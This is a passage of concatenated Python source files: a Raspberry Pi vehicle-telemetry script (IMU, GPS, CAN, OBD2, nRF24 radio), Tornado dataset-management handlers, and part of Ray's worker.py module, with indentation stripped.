try:
self._real_run()
except:
print(self.errmsg)
def MPU_Init():
#write to sample rate register
bus.write_byte_data(Device_Address, SMPLRT_DIV, 7)
#Write to power management register
bus.write_byte_data(Device_Address, PWR_MGMT_1, 1)
#Write to Configuration register
bus.write_byte_data(Device_Address, CONFIG, 0)
#Write to Gyro configuration register
bus.write_byte_data(Device_Address, GYRO_CONFIG, 24)
#Write to interrupt enable register
bus.write_byte_data(Device_Address, INT_ENABLE, 1)
def read_raw_data(addr):
#Accelero and Gyro value are 16-bit
high = bus.read_byte_data(Device_Address, addr)
low = bus.read_byte_data(Device_Address, addr+1)
#concatenate higher and lower value
value = ((high << 8) | low)
#to get signed value from mpu6050
if(value > 32768):
value = value - 65536
return value
def loopIMU(num,sheet):
"""
Function to print IMU Data in a Loop
"""
print("Initializing IMU")
SETTINGS_FILE = "/home/pi/SeniorDesign_159/Hermes_T_Box/IMU/RTEllipsoidFit/RTIMULib.ini"
s = RTIMU.Settings(SETTINGS_FILE)
imu = RTIMU.RTIMU(s)
if (not imu.IMUInit()):
print("Failed to initialize IMU")
isIMU = False
exit(1)
else:
print("Recording IMU Data")
imu.setSlerpPower(0.01)
imu.setGyroEnable(True)
imu.setAccelEnable(True)
imu.setCompassEnable(True)
poll_interval = imu.IMUGetPollInterval()
roll = ""
pitch = ""
yaw = ""
while(num>0):
if imu.IMURead():
data = imu.getIMUData()
#print("Hello")
fusionPose = data["fusionPose"]
#global roll, pitch, yaw
roll = degrees(fusionPose[0])
pitch = degrees(fusionPose[1])
yaw = degrees(fusionPose[2])
global buffer
buffer[0] = struct.pack("if",1,roll)
buffer[1] = struct.pack("if",2,pitch)
buffer[2] = struct.pack("if",3,yaw)
global row
sheet.write(row, 0, str(roll))
sheet.write(row, 1, str(pitch))
sheet.write(row, 2, str(yaw))
row+=1
num-=1
#print ("Gx=%.2f" %Gx, u'\u00b0'+ "/s", "\tGy=%.2f" %Gy, u'\u00b0'+ "/s", "\tGz=%.2f" %Gz, u'\u00b0'+ "/s", "\tAx=%.2f g" %Ax, "\tAy=%.2f g" %Ay, "\tAz=%.2f g" %Az)
sleep(.01)
global isFinished
isFinished[0] = True
def loopGPS(num,sheet):
"""
Function to print IMU Data in a Loop
"""
uart = serial.Serial("/dev/ttyUSB0", baudrate=9600,timeout=10)
gps = adafruit_gps.GPS(uart,debug=False)
gps.send_command(b'PMTK314,0,1,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0')
gps.send_command(b'PMTK220,10')
last_print = time.monotonic()
while num>0:
# Make sure to call gps.update() every loop iteration and at least twice
# as fast as data comes from the GPS unit (usually every second).
# This returns a bool that's true if it parsed new data (you can ignore it
# though if you don't care and instead look at the has_fix property).
#print("h")
#print(gps.readline())
gps.update()
# Every second print out current location details if there's a fix.
current = time.monotonic()
if current - last_print >= .010:
num-=1
last_print = current
if not gps.has_fix:
# Try again if we don't have a fix yet.
#print('Waiting for fix...\n')
continue
# We have a fix! (gps.has_fix is true)
# Print out details about the fix like location, date, etc.
print('=' * 40) # Print a separator line.
print('Fix timestamp: {}/{}/{} {:02}:{:02}:{:02}'.format(
gps.timestamp_utc.tm_mon, # Grab parts of the time from the
gps.timestamp_utc.tm_mday, # struct_time object that holds
gps.timestamp_utc.tm_year, # the fix time. Note you might
gps.timestamp_utc.tm_hour, # not get all data like year, day,
gps.timestamp_utc.tm_min, # month!
gps.timestamp_utc.tm_sec))
gps_lat = gps.latitude
gps_long = gps.longitude
global buffer
buffer[3] = struct.pack("if",4,gps_lat)
buffer[4] = struct.pack("if",5,gps_long)
print('Latitude: {0:.6f} degrees'.format(gps_lat))
print('Longitude: {0:.6f} degrees'.format(gps_long))
global row
sheet.write(row, 3, str(gps_lat))
sheet.write(row, 4, str(gps_long))
#print('Fix quality: {}'.format(gps.fix_quality))
# Some attributes beyond latitude, longitude and timestamp are optional
# and might not be present. Check if they're None before trying to use!
# if gps.satellites is not None:
# print('# satellites: {}'.format(gps.satellites))
# if gps.altitude_m is not None:
# print('Altitude: {} meters'.format(gps.altitude_m))
# if gps.speed_knots is not None:
# print('Speed: {} knots'.format(gps.speed_knots))
# if gps.track_angle_deg is not None:
# print('Track angle: {} degrees'.format(gps.track_angle_deg))
# if gps.horizontal_dilution is not None:
# print('Horizontal dilution: {}'.format(gps.horizontal_dilution))
# if gps.height_geoid is not None:
# print('Height geo ID: {} meters'.format(gps.height_geoid))
print("\n")
global isFinished
isFinished[1] = True
def loopCAN(num,sheet):
print("Opening Can Bus")
print("Check CAN WIRES If Outputs Are Weird!")
os.system('sudo ip link set can0 up type can bitrate 500000')
bus = can.Bus(bustype = 'socketcan',channel='can0')
canbus = bus.recv(0.01)
global buffer
while(num>0):
c = bus.recv(0.01)
if(c!=None):
canbus = list(c.data)
for i,val in enumerate(canbus):
buffer[5+i] = struct.pack("if",5+i+1,val)
global row
sheet.write(row, 5, str(canbus))
#print(canbus)
num-=1
global isFinished
isFinished[2] = True
os.system("sudo ip link set can0 down")
def loopOBD2(num,sheet):
print("Starting OBD2 Reading.. ")
connection = obd.OBD("/dev/ttyUSB1")
carCommands = [obd.commands.ENGINE_LOAD,
# obd.commands.COOLANT_TEMP,
# obd.commands.FUEL_PRESSURE,
obd.commands.RPM,
obd.commands.SPEED,
# obd.commands.INTAKE_TEMP,
# obd.commands.MAF,
obd.commands.THROTTLE_POS]
while(connection.is_connected() and num>0):
respCommands = []
for c in carCommands:
respCommands.append(str(connection.query(c).value))
global buffer
for i,val in enumerate(respCommands):
buffer[13+i] = struct.pack("if",13+i+1,val)
# buffer[13:17] = respCommands
global row
sheet.write(row, 6, str(respCommands[0]))
sheet.write(row, 7, str(respCommands[1]))
sheet.write(row, 8, str(respCommands[2]))
sheet.write(row, 9, str(respCommands[3]))
num-=1
time.sleep(0.01)
global isFinished
isFinished[3] = True
def master(nrf): # count = 5 will only transmit 5 packets
"""Transmits an incrementing integer every second"""
# set address of RX node into a TX pipe
nrf.open_tx_pipe(address)
# ensures the nRF24L01 is in TX mode
nrf.listen = False
global isFinished, buffer
start = time.monotonic()
success_percentage = 0
while (False in isFinished):
result = nrf.send(list(filter(lambda i: i!=struct.pack("if",-1,-1.0), buffer)))
success_percentage += result.count(True)
print("Total Sent: ", success_percentage)
print("Total Time: ", time.monotonic() - start)
print('Transmission Speed', (time.monotonic() - start)/success_percentage)
# for ind,val in enumerate(buffer):
# if(val!=-1):
# buf = struct.pack('<if', ind,val)
# # 'i' means a single 4 byte int value.
# # '<' means little endian byte order. this may be optional
## print("Sending: {} as struct: {}".format(ind, val))
# now = time.monotonic() * 1000 # start timer
# result = nrf.send(buf)
# if result is None:
# pass
## print('send() timed out')
# elif not result:
# pass
## print('send() failed')
# else:
## print('send() successful')
# total+=time.monotonic() * 1000 - now
# count+=1
# # print timer results despite transmission success
# #print('Transmission took',
# # time.monotonic() * 1000 - now, 'ms')
# print("Total time :",time.monotonic() - start)
# print("Total Transmitted: ", count)
# print("Average Transmission Time for a Data Value: ",str((time.monotonic()- start)/count))
#time.sleep(0.25)
if __name__ == "__main__":
# #some MPU6050 Registers and their Address
# PWR_MGMT_1 = 0x6B
# SMPLRT_DIV = 0x19
# CONFIG = 0x1A
# GYRO_CONFIG = 0x1B
# INT_ENABLE = 0x38
# ACCEL_XOUT_H = 0x3B
# ACCEL_YOUT_H = 0x3D
# ACCEL_ZOUT_H = 0x3F
# GYRO_XOUT_H = 0x43
# GYRO_YOUT_H = 0x45
# GYRO_ZOUT_H = 0x47
#
# bus = smbus.SMBus(1) # or bus = smbus.SMBus(0) for older version boards
# Device_Address = 0x68 # MPU6050 device address
#
# MPU_Init()
# Workbook is created
wb = Workbook()
# add_sheet is used to create sheet.
sheet1 = wb.add_sheet('Hermes Telemetry Data',cell_overwrite_ok=True)
sheet1.write(0, 0, "Roll")
sheet1.write(0, 1, "Pitch")
sheet1.write(0, 2, "Yaw")
sheet1.write(0, 3, "GPS Lat")
sheet1.write(0, 4, "GPS Long")
sheet1.write(0, 5, "CAN Bus")
sheet1.write(0, 6, "Engine Load")
sheet1.write(0, 7, "RPM")
sheet1.write(0, 8, "Speed")
sheet1.write(0, 9, "Throttle Pos")
# addresses needs to be in a buffer protocol object (bytearray)
address = b'1Node'
# change these (digital output) pins accordingly
ce = dio.DigitalInOut(board.D4)
csn = dio.DigitalInOut(board.D5)
# using board.SPI() automatically selects the MCU's
# available SPI pins, board.SCK, board.MOSI, board.MISO
spi = busio.SPI(board.SCLK_1,board.MOSI_1,board.MISO_1) # init spi bus object
# we'll be using the dynamic payload size feature (enabled by default)
# initialize the nRF24L01 on the spi bus object
nrf = RF24(spi, csn, ce)
nrf.data_rate = 2
# help(nrf)
# creating thread
# t1 = threading.Thread(target=loopIMU, args=(100,))
# t2 = threading.Thread(target=loopGPS, args=(10,))
# t3 = threading.Thread(target=loopCAN, args=(10,))
# t4 = threading.Thread(target=loopOBD2, args=(10,))
# # starting thread 1
# t1.start()
# # starting thread 2
# t2.start()
# # starting thread 3
# t3.start()
# # starting thread 4
# t4.start()
#
# # wait until thread 1 is completely executed
# t1.join()
# # wait until thread 2 is completely executed
# t2.join()
# # wait until thread 3 is completely executed
# t3.join()
# # wait until thread 4 is completely executed
# t4.join()
t1 = ExceptionThread("IMU Sensor Failed!",target=loopIMU, args=(1000,sheet1))
t2 = ExceptionThread("GPS Sensor Failed!",target=loopGPS, args=(1000,sheet1,))
t3 = ExceptionThread("CAN Bus Failed!",target=loopCAN, args=(1000,sheet1,))
t4 = ExceptionThread("OBD2 Connection Failed!",target=loopOBD2, args=(1000,sheet1,))
t5 = ExceptionThread("Transmission Failed!",target=master, args=(nrf,))
t1.execute()
t2.execute()
t3.execute()
t4.execute()
t5.execute()
t1.join()
t2.join()
t3.join()
t4.join()
t5.join()
wb.save('HermesTelemetryData.xls')
# both threads completely executed
|
datasets.py
|
from __future__ import absolute_import, print_function, division
import logging
import os
import tornado.web
import yaml
from tornado import gen
from threading import Thread
from .common import BaseHandler
from ..web_datasets import DATASETS
class RefreshHandler(BaseHandler):
@tornado.web.authenticated
def get(self):
self.write('''<form action='refresh' method='POST'>
<input type='submit' value='Refresh Data'>
</form>''')
@gen.coroutine
def post(self):
logging.info('Refreshing datasets')
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
self.redirect('/datasets')
@staticmethod
def _reload(ds, callback=None):
t = Thread(target=lambda: callback(ds.reload()))
t.daemon = True
t.start()
class RemovalHandler(BaseHandler):
def post(self):
ds = self.request_one_ds('kind', 'name')
if not ds.user_added:
return self.visible_error(403, 'Cannot remove this dataset.')
logging.info('Removing user-added dataset: %s', ds)
del DATASETS[ds.kind][ds.name]
self.redirect('/datasets')
# Remove the dataset from user-uploaded files.
config_path = os.path.join(os.path.dirname(__file__),
'../../uploads/user_data.yml')
if os.path.exists(config_path):
config = yaml.safe_load(open(config_path))
entry = config[ds.kind].pop(ds.name)
os.remove(entry['file'])
yaml.safe_dump(config, open(config_path, 'w'), allow_unicode=True)
class NightlyRefreshHandler(BaseHandler):
@gen.coroutine
def post(self):
ip = self.request.remote_ip
allowed_ips = self.application.settings['nightly_refresh_ips']
if ip not in allowed_ips:
logging.info('Invalid remote ip {} for nightly refresh'.format(ip))
self.redirect('/login?next=%2Frefresh')
return
logging.info('Refreshing datasets for ip {} after nightly'.format(ip))
for ds in self.all_datasets():
yield gen.Task(RefreshHandler._reload, ds)
return
routes = [
(r'/_remove_dataset', RemovalHandler),
(r'/refresh', RefreshHandler),
(r'/nightly-refresh', NightlyRefreshHandler),
]
|
worker.py
|
from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray.util.scheduling_strategies import SchedulingStrategyT
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsPublisher, \
GcsErrorSubscriber, GcsLogSubscriber, GcsFunctionKeySubscriber
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
from ray._private.utils import check_oversized_function
from ray.util.inspect import is_cython
from ray.experimental.internal_kv import (_internal_kv_initialized,
_initialize_internal_kv,
_internal_kv_reset, _internal_kv_get)
from ray._private.client_mode_hook import client_mode_hook
SCRIPT_MODE = 0
WORKER_MODE = 1
LOCAL_MODE = 2
SPILL_WORKER_MODE = 3
RESTORE_WORKER_MODE = 4
ERROR_KEY_PREFIX = b"Error:"
# Logger for this module. It should be configured at the entry point
# into the program using Ray. Ray provides a default configuration at
# entry/init points.
logger = logging.getLogger(__name__)
# Visible for testing.
def _unhandled_error_handler(e: Exception):
logger.error("Unhandled error (suppress with "
"RAY_IGNORE_UNHANDLED_ERRORS=1): {}".format(e))
class Worker:
"""A class used to define the control flow of a worker process.
Note:
The methods in this class are considered unexposed to the user. The
functions outside of this class are considered exposed.
Attributes:
node (ray.node.Node): The node this worker is attached to.
mode: The mode of the worker. One of SCRIPT_MODE, LOCAL_MODE, and
WORKER_MODE.
cached_functions_to_run (List): A list of functions to run on all of
the workers that should be exported as soon as connect is called.
"""
def __init__(self):
"""Initialize a Worker object."""
self.node = None
self.mode = None
self.cached_functions_to_run = []
self.actors = {}
# When the worker is constructed. Record the original value of the
# CUDA_VISIBLE_DEVICES environment variable.
self.original_gpu_ids = ray._private.utils.get_cuda_visible_devices()
self.memory_monitor = memory_monitor.MemoryMonitor()
# A dictionary that maps from driver id to SerializationContext
# TODO: clean up the SerializationContext once the job finished.
self.serialization_context_map = {}
self.function_actor_manager = FunctionActorManager(self)
# This event is checked regularly by all of the threads so that they
# know when to exit.
self.threads_stopped = threading.Event()
# Index of the current session. This number will
# increment every time when `ray.shutdown` is called.
self._session_index = 0
# If this is set, the next .remote call should drop into the
# debugger, at the specified breakpoint ID.
self.debugger_breakpoint = b""
# If this is set, ray.get calls invoked on the object ID returned
# by the worker should drop into the debugger at the specified
# breakpoint ID.
self.debugger_get_breakpoint = b""
# If True, make the debugger external to the node this worker is
# running on.
self.ray_debugger_external = False
self._load_code_from_local = False
# Used to toggle whether or not logs should be filtered to only those
# produced in the same job.
self.filter_logs_by_job = True
@property
def connected(self):
"""bool: True if Ray has been started and False otherwise."""
return self.node is not None
@property
def node_ip_address(self):
self.check_connected()
return self.node.node_ip_address
@property
def load_code_from_local(self):
self.check_connected()
return self._load_code_from_local
@property
def current_job_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_current_job_id()
return JobID.nil()
@property
def actor_id(self):
if hasattr(self, "core_worker"):
return self.core_worker.get_actor_id()
return ActorID.nil()
@property
def current_task_id(self):
return self.core_worker.get_current_task_id()
@property
def current_node_id(self):
return self.core_worker.get_current_node_id()
@property
def namespace(self):
return self.core_worker.get_job_config().ray_namespace
@property
def placement_group_id(self):
return self.core_worker.get_placement_group_id()
@property
def worker_id(self):
return self.core_worker.get_worker_id().binary()
@property
def should_capture_child_tasks_in_placement_group(self):
return self.core_worker.should_capture_child_tasks_in_placement_group()
@property
def current_session_and_job(self):
"""Get the current session index and job id as pair."""
assert isinstance(self._session_index, int)
assert isinstance(self.current_job_id, ray.JobID)
return self._session_index, self.current_job_id
@property
def runtime_env(self):
"""Get the runtime env in json format"""
return self.core_worker.get_current_runtime_env()
def get_serialization_context(self, job_id=None):
"""Get the SerializationContext of the job that this worker is processing.
Args:
job_id: The ID of the job that indicates which job to get
the serialization context for.
Returns:
The serialization context of the given job.
"""
# This function needs to be protected by a lock, because it will be
# called by`register_class_for_serialization`, as well as the import
# thread, from different threads. Also, this function will recursively
# call itself, so we use RLock here.
if job_id is None:
job_id = self.current_job_id
with self.lock:
if job_id not in self.serialization_context_map:
self.serialization_context_map[
job_id] = serialization.SerializationContext(self)
return self.serialization_context_map[job_id]
def check_connected(self):
"""Check if the worker is connected.
Raises:
Exception: An exception is raised if the worker is not connected.
"""
if not self.connected:
raise RaySystemError("Ray has not been started yet. You can "
"start Ray with 'ray.init()'.")
def set_mode(self, mode):
"""Set the mode of the worker.
The mode SCRIPT_MODE should be used if this Worker is a driver that is
being run as a Python script or interactively in a shell. It will print
information about task failures.
The mode WORKER_MODE should be used if this Worker is not a driver. It
will not print information about tasks.
The mode LOCAL_MODE should be used if this Worker is a driver and if
you want to run the driver in a manner equivalent to serial Python for
debugging purposes. It will not send remote function calls to the
scheduler and will instead execute them in a blocking fashion.
Args:
mode: One of SCRIPT_MODE, WORKER_MODE, and LOCAL_MODE.
"""
self.mode = mode
def set_load_code_from_local(self, load_code_from_local):
self._load_code_from_local = load_code_from_local
def put_object(self, value, object_ref=None, owner_address=None):
"""Put value in the local object store with object reference `object_ref`.
This assumes that the value for `object_ref` has not yet been placed in
the local object store. If the plasma store is full, the worker will
automatically retry up to DEFAULT_PUT_OBJECT_RETRIES times. Each
retry will delay for an exponentially doubling amount of time,
starting with DEFAULT_PUT_OBJECT_DELAY. After this, exception
will be raised.
Args:
value: The value to put in the object store.
object_ref (ObjectRef): The object ref of the value to be
put. If None, one will be generated.
owner_address: The serialized address of object's owner.
Returns:
ObjectRef: The object ref the object was put under.
Raises:
ray.exceptions.ObjectStoreFullError: This is raised if the attempt
to store the object fails because the object store is full even
after multiple retries.
"""
# Make sure that the value is not an object ref.
if isinstance(value, ObjectRef):
raise TypeError(
"Calling 'put' on an ray.ObjectRef is not allowed "
"(similarly, returning an ray.ObjectRef from a remote "
"function is not allowed). If you really want to "
"do this, you can wrap the ray.ObjectRef in a list and "
"call 'put' on it (or return it).")
if self.mode == LOCAL_MODE:
assert object_ref is None, ("Local Mode does not support "
"inserting with an ObjectRef")
serialized_value = self.get_serialization_context().serialize(value)
# This *must* be the first place that we construct this python
# ObjectRef because an entry with 0 local references is created when
# the object is Put() in the core worker, expecting that this python
# reference will be created. If another reference is created and
# removed before this one, it will corrupt the state in the
# reference counter.
return ray.ObjectRef(
self.core_worker.put_serialized_object(
serialized_value,
object_ref=object_ref,
owner_address=owner_address),
# If the owner address is set, then the initial reference is
# already acquired internally in CoreWorker::CreateOwned.
# TODO(ekl) we should unify the code path more with the others
# to avoid this special case.
skip_adding_local_ref=(owner_address is not None))
def raise_errors(self, data_metadata_pairs, object_refs):
out = self.deserialize_objects(data_metadata_pairs, object_refs)
if "RAY_IGNORE_UNHANDLED_ERRORS" in os.environ:
return
for e in out:
_unhandled_error_handler(e)
def deserialize_objects(self, data_metadata_pairs, object_refs):
# Function actor manager or the import thread may call pickle.loads
# at the same time which can lead to failed imports
# TODO: We may be better off locking on all imports or injecting a lock
# into pickle.loads (https://github.com/ray-project/ray/issues/16304)
with self.function_actor_manager.lock:
context = self.get_serialization_context()
return context.deserialize_objects(data_metadata_pairs,
object_refs)
def get_objects(self, object_refs, timeout=None):
"""Get the values in the object store associated with the IDs.
Return the values from the local object store for object_refs. This
will block until all the values for object_refs have been written to
the local object store.
Args:
object_refs (List[object_ref.ObjectRef]): A list of the object refs
whose values should be retrieved.
timeout (float): timeout (float): The maximum amount of time in
seconds to wait before returning.
Returns:
list: List of deserialized objects
bytes: UUID of the debugger breakpoint we should drop
into or b"" if there is no breakpoint.
"""
# Make sure that the values are object refs.
for object_ref in object_refs:
if not isinstance(object_ref, ObjectRef):
raise TypeError(
f"Attempting to call `get` on the value {object_ref}, "
"which is not an ray.ObjectRef.")
timeout_ms = int(timeout * 1000) if timeout else -1
data_metadata_pairs = self.core_worker.get_objects(
object_refs, self.current_task_id, timeout_ms)
debugger_breakpoint = b""
for (data, metadata) in data_metadata_pairs:
if metadata:
metadata_fields = metadata.split(b",")
if len(metadata_fields) >= 2 and metadata_fields[1].startswith(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):
debugger_breakpoint = metadata_fields[1][len(
ray_constants.OBJECT_METADATA_DEBUG_PREFIX):]
return self.deserialize_objects(data_metadata_pairs,
object_refs), debugger_breakpoint
def run_function_on_all_workers(self, function):
"""Run arbitrary code on all of the workers.
This function will first be run on the driver, and then it will be
exported to all of the workers to be run. It will also be run on any
new workers that register later. If ray.init has not been called yet,
then cache the function and export it later.
Args:
function (Callable): The function to run on all of the workers. It
takes only one argument, a worker info dict. If it returns
anything, its return values will not be used.
"""
# If ray.init has not been called yet, then cache the function and
# export it when connect is called. Otherwise, run the function on all
# workers.
if self.mode is None:
self.cached_functions_to_run.append(function)
else:
# Attempt to pickle the function before we need it. This could
# fail, and it is more convenient if the failure happens before we
# actually run the function locally.
pickled_function = pickle.dumps(function)
function_to_run_id = hashlib.shake_128(pickled_function).digest(
ray_constants.ID_SIZE)
key = b"FunctionsToRun:" + function_to_run_id
# First run the function on the driver.
# We always run the task locally.
function({"worker": self})
# Check if the function has already been put into redis.
function_exported = self.gcs_client.internal_kv_put(
b"Lock:" + key, b"1", False,
ray_constants.KV_NAMESPACE_FUNCTION_TABLE) == 0
if function_exported is True:
# In this case, the function has already been exported, so
# we don't need to export it again.
return
check_oversized_function(pickled_function, function.__name__,
"function", self)
# Run the function on all workers.
self.gcs_client.internal_kv_put(
key,
pickle.dumps({
"job_id": self.current_job_id.binary(),
"function_id": function_to_run_id,
"function": pickled_function,
}), True, ray_constants.KV_NAMESPACE_FUNCTION_TABLE)
self.function_actor_manager.export_key(key)
# TODO(rkn): If the worker fails after it calls setnx and before it
# successfully completes the hset and rpush, then the program will
# most likely hang. This could be fixed by making these three
# operations into a transaction (or by implementing a custom
# command that does all three things).
def main_loop(self):
"""The main loop a worker runs to receive and execute tasks."""
def sigterm_handler(signum, frame):
shutdown(True)
sys.exit(1)
ray._private.utils.set_sigterm_handler(sigterm_handler)
self.core_worker.run_task_loop()
sys.exit(0)
def print_logs(self):
"""Prints log messages from workers on all nodes in the same job.
"""
if self.gcs_pubsub_enabled:
subscriber = self.gcs_log_subscriber
subscriber.subscribe()
else:
subscriber = self.redis_client.pubsub(
ignore_subscribe_messages=True)
subscriber.subscribe(gcs_utils.LOG_FILE_CHANNEL)
localhost = services.get_node_ip_address()
try:
# Keep track of the number of consecutive log messages that have
# been received with no break in between. If this number grows
# continually, then the worker is probably not able to process the
# log messages as rapidly as they are coming in.
num_consecutive_messages_received = 0
job_id_hex = self.current_job_id.hex()
while True:
# Exit if we received a signal that we should stop.
if self.threads_stopped.is_set():
return
if self.gcs_pubsub_enabled:
msg = subscriber.poll()
else:
msg = subscriber.get_message()
if msg is None:
num_consecutive_messages_received = 0
self.threads_stopped.wait(timeout=0.01)
continue
num_consecutive_messages_received += 1
if (num_consecutive_messages_received % 100 == 0
and num_consecutive_messages_received > 0):
logger.warning(
"The driver may not be able to keep up with the "
"stdout/stderr of the workers. To avoid forwarding "
"logs to the driver, use "
"'ray.init(log_to_driver=False)'.")
if self.gcs_pubsub_enabled:
data = msg
else:
data = json.loads(ray._private.utils.decode(msg["data"]))
# Don't show logs from other drivers.
if (self.filter_logs_by_job and data["job"]
and job_id_hex != data["job"]):
continue
data["localhost"] = localhost
global_worker_stdstream_dispatcher.emit(data)
except (OSError, redis.exceptions.ConnectionError) as e:
logger.error(f"print_logs: {e}")
finally:
# Close the pubsub client to avoid leaking file descriptors.
subscriber.close()
@PublicAPI
@client_mode_hook(auto_init=True)
def get_gpu_ids():
"""Get the IDs of the GPUs that are available to the worker.
If the CUDA_VISIBLE_DEVICES environment variable was set when the worker
started up, then the IDs returned by this method will be a subset of the
IDs in CUDA_VISIBLE_DEVICES. If not, the IDs will fall in the range
[0, NUM_GPUS - 1], where NUM_GPUS is the number of GPUs that the node has.
Returns:
A list of GPU IDs.
"""
worker = global_worker
worker.check_connected()
if worker.mode != WORKER_MODE:
if log_once("worker_get_gpu_ids_empty_from_driver"):
logger.warning(
"`ray.get_gpu_ids()` will always return the empty list when "
"called from the driver. This is because Ray does not manage "
"GPU allocations to the driver process.")
# TODO(ilr) Handle inserting resources in local mode
all_resource_ids = global_worker.core_worker.resource_ids()
assigned_ids = set()
for resource, assignment in all_resource_ids.items():
# Handle both normal and placement group GPU resources.
# Note: We should only get the GPU ids from the placement
# group resource that does not contain the bundle index!
import re
if resource == "GPU" or re.match(r"^GPU_group_[0-9A-Za-z]+$",
resource):
for resource_id, _ in assignment:
assigned_ids.add(resource_id)
assigned_ids = list(assigned_ids)
# If the user had already set CUDA_VISIBLE_DEVICES, then respect that (in
# the sense that only GPU IDs that appear in CUDA_VISIBLE_DEVICES should be
# returned).
if global_worker.original_gpu_ids is not None:
assigned_ids = [
global_worker.original_gpu_ids[gpu_id] for gpu_id in assigned_ids
]
# Give all GPUs in local_mode.
if global_worker.mode == LOCAL_MODE:
max_gpus = global_worker.node.get_resource_spec().num_gpus
assigned_ids = global_worker.original_gpu_ids[:max_gpus]
return assigned_ids
@Deprecated
def get_resource_ids():
"""Get the IDs of the resources that are available to the worker.
Returns:
A dictionary mapping the name of a resource to a list of pairs, where
each pair consists of the ID of a resource and the fraction of that
resource reserved for this worker.
"""
worker = global_worker
worker.check_connected()
if _mode() == LOCAL_MODE:
raise RuntimeError(
"ray.worker.get_resource_ids() currently does not work in "
"local_mode.")
return global_worker.core_worker.resource_ids()
@Deprecated
def get_dashboard_url():
"""Get the URL to access the Ray dashboard.
Note that the URL does not specify which node the dashboard is on.
Returns:
The URL of the dashboard as a string.
"""
worker = global_worker
worker.check_connected()
return _global_node.webui_url
global_worker = Worker()
"""Worker: The global Worker object for this worker process.
We use a global Worker object to ensure that there is a single worker object
per worker process.
"""
_global_node = None
"""ray.node.Node: The global node object that is created by ray.init()."""
@PublicAPI
@client_mode_hook(auto_init=False)
def init(
address: Optional[str] = None,
*,
num_cpus: Optional[int] = None,
num_gpus: Optional[int] = None,
resources: Optional[Dict[str, float]] = None,
object_store_memory: Optional[int] = None,
local_mode: bool = False,
ignore_reinit_error: bool = False,
include_dashboard: Optional[bool] = None,
dashboard_host: str = ray_constants.DEFAULT_DASHBOARD_IP,
dashboard_port: Optional[int] = None,
job_config: "ray.job_config.JobConfig" = None,
configure_logging: bool = True,
logging_level: int = ray_constants.LOGGER_LEVEL,
logging_format: str = ray_constants.LOGGER_FORMAT,
log_to_driver: bool = True,
namespace: Optional[str] = None,
runtime_env: Dict[str, Any] = None,
# The following are unstable parameters and their use is discouraged.
_enable_object_reconstruction: bool = False,
_redis_max_memory: Optional[int] = None,
_plasma_directory: Optional[str] = None,
_node_ip_address: str = ray_constants.NODE_DEFAULT_IP,
_driver_object_store_memory: Optional[int] = None,
_memory: Optional[int] = None,
_redis_password: str = ray_constants.REDIS_DEFAULT_PASSWORD,
_temp_dir: Optional[str] = None,
_metrics_export_port: Optional[int] = None,
_system_config: Optional[Dict[str, str]] = None,
_tracing_startup_hook: Optional[Callable] = None,
**kwargs):
"""
Connect to an existing Ray cluster or start one and connect to it.
This method handles two cases; either a Ray cluster already exists and we
just attach this driver to it or we start all of the processes associated
with a Ray cluster and attach to the newly started cluster.
To start Ray locally and all of the relevant processes, use this as
follows:
.. code-block:: python
ray.init()
To connect to an existing local cluster, use this as follows.
.. code-block:: python
ray.init(address="auto")
To connect to an existing remote cluster, use this as follows (substituting
in the appropriate address). Note the addition of "ray://" at the beginning
of the address.
.. code-block:: python
ray.init(address="ray://123.45.67.89:10001")
More details for starting and connecting to a remote cluster can be found
here: https://docs.ray.io/en/master/cluster/ray-client.html
You can also define an environment variable called `RAY_ADDRESS` in
the same format as the `address` parameter to connect to an existing
cluster with ray.init() or ray.init(address="auto").
Args:
address (str): The address of the Ray cluster to connect to. If
this address is not provided, then this command will start Redis,
a raylet, a plasma store, a plasma manager, and some workers.
It will also kill these processes when Python exits. If the driver
is running on a node in a Ray cluster, using `auto` as the value
tells the driver to detect the cluster, removing the need to
specify a specific node address. If the environment variable
`RAY_ADDRESS` is defined and the address is None or "auto", Ray
will set `address` to `RAY_ADDRESS`.
Addresses can be prefixed with a "ray://" to connect to a remote
cluster. For example, passing in the address
"ray://123.45.67.89:50005" will connect to the cluster at the
given address.
num_cpus (int): Number of CPUs the user wishes to assign to each
raylet. By default, this is set based on virtual cores.
num_gpus (int): Number of GPUs the user wishes to assign to each
raylet. By default, this is set based on detected GPUs.
resources: A dictionary mapping the names of custom resources to the
quantities for them available.
object_store_memory: The amount of memory (in bytes) to start the
object store with. By default, this is automatically set based on
available system memory.
local_mode (bool): If true, the code will be executed serially. This
is useful for debugging.
ignore_reinit_error: If true, Ray suppresses errors from calling
ray.init() a second time. Ray won't be restarted.
include_dashboard: Boolean flag indicating whether or not to start the
Ray dashboard, which displays the status of the Ray
cluster. If this argument is None, then the UI will be started if
the relevant dependencies are present.
dashboard_host: The host to bind the dashboard server to. Can either be
localhost (127.0.0.1) or 0.0.0.0 (available from all interfaces).
By default, this is set to localhost to prevent access from
external machines.
dashboard_port(int, None): The port to bind the dashboard server to.
